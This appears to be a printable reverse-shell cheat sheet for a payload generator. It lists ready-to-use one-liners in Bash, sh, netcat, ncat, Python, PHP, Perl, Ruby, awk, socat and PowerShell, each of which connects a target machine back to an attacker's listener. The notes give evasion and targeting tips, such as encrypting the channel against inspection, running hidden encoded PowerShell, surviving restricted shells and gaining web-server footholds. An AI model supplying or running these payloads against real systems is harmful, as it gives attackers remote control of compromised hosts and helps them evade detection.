Cheat sheet
One-liner reference
A printable scan of the payloads available in the generator. Replace LHOST and LPORT with your listener values, or let the generator substitute and encode them for you.
Linux / Unix
| Shell | Payload | Notes |
|---|---|---|
| Bash /dev/tcp | bash -i >& /dev/tcp/LHOST/LPORT 0>&1 | No external binary; needs Bash with /dev/tcp. |
| Bash 196 | 0<&196;exec 196<>/dev/tcp/LHOST/LPORT; bash <&196 >&196 2>&196 | Survives some restricted shells. |
| sh | sh -i >& /dev/tcp/LHOST/LPORT 0>&1 | POSIX fallback where Bash is absent. |
| nc -e | nc LHOST LPORT -e /bin/sh | Only on netcat built with -e support. |
| nc mkfifo | rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc LHOST LPORT >/tmp/f | Works without -e via named pipe. |
| ncat TLS | ncat --ssl LHOST LPORT -e /bin/bash | Encrypts the channel against inspection. |
| Python 3 | python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("LHOST",LPORT));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/bash")' | Portable; spawns a PTY directly. |
| PHP | php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");' | Great for web-server footholds. |
| Perl | perl -e 'use Socket;...exec("/bin/sh -i");' | Preinstalled on most Unix hosts. |
| Ruby | ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LHOST",LPORT))' | Concise socket spawn. |
| awk | awk 'BEGIN{s="/inet/tcp/0/LHOST/LPORT";...}' /dev/null | Last resort when little is installed. |
| socat PTY | socat TCP:LHOST:LPORT EXEC:'bash -li',pty,stderr,setsid,sigint,sane | Fully interactive TTY out of the box. |
Windows
| Shell | Payload | Notes |
|---|---|---|
| PowerShell TCPClient | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',LPORT);..." | The default Windows reverse shell. |
| PowerShell -enc | powershell -nop -w hidden -enc <UTF16LE-base64> | Use the Base64 toggle on the generator. |
| nc.exe | nc.exe LHOST LPORT -e cmd.exe | Requires nc.exe / ncat.exe on target. |
| Python 3 (Win) | python3 -c "import socket,subprocess,os;...Popen(['cmd.exe'],...)" | If Python is installed on the host. |
Pick by environment, not habit
The most reliable payload is the one whose interpreter already exists on the target. Enumerate first (which python3 bash nc socat on Linux, or check $PSVersionTable on Windows), then choose a matching one-liner.